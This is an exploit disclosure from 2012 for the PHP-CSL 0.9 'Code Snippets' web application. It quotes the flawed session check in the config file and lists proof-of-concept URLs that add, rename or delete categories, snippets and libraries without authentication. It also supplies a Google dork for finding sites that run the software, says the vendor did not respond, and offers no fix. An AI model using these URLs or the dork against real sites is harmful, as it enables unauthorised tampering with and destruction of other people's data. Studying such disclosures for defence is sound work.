# --------------------------------------- #
Author : L3b-r1'z
Title : Code Snippets Version 0,9 insecure session
Date : 6/30/2012
Email : L3br1z@Gmail.com
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "Powered by: PHP-CSL V0.9"
Version : 1.1.0
[ 6/30/2012 ] - Vulnerability discovered
[ 6/30/2012 ] - Vendor Contacted But No Response.
[ 6/30/2012 ] - Public disclosure
# --------------------------------------- #
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
2) Bug :

Look to file named config in line (120) to (138)


if(!session_is_registered('phpcsl') &&
   !isset($_GET['login']) && isset($_GET['act'])) {

       if(!$_GET['act'] == "session") {
        $ur = "index.php?login=y&q=".base64_encode(querystr());
     header("Location: $ur");
       }
}


// build URL querystring
function querystr() {
    global $HTTP_GET_VARS;
    $q = "";
    foreach($HTTP_GET_VARS as $n => $m) {
        $q .= "$n=$m&";
    }
    return $q;
}

Here the file just secured the login page
but not secured the add snip or edit or delete
thats mean an attacker can add snippets or edit or delete or add category
:D
# --------------------------------------- #
3) PoC :
http://localhost/codesnippets/index.php?op=cats&act=add -  Add new Category
http://localhost/codesnippets/index.php?op=snips&act=add - Add new snippets
http://localhost/codesnippets/index.php?op=cats&act=edit - rename category
http://localhost/codesnippets/index.php?op=cats&act=delete - delete category
http://localhost/codesnippets/index.php?op=lib&act=add - add new library
http://localhost/codesnippets/index.php?op=lib&act=edit - rename library
http://localhost/codesnippets/index.php?op=lib&act=delete - delete library
# --------------------------------------- #
<< EOF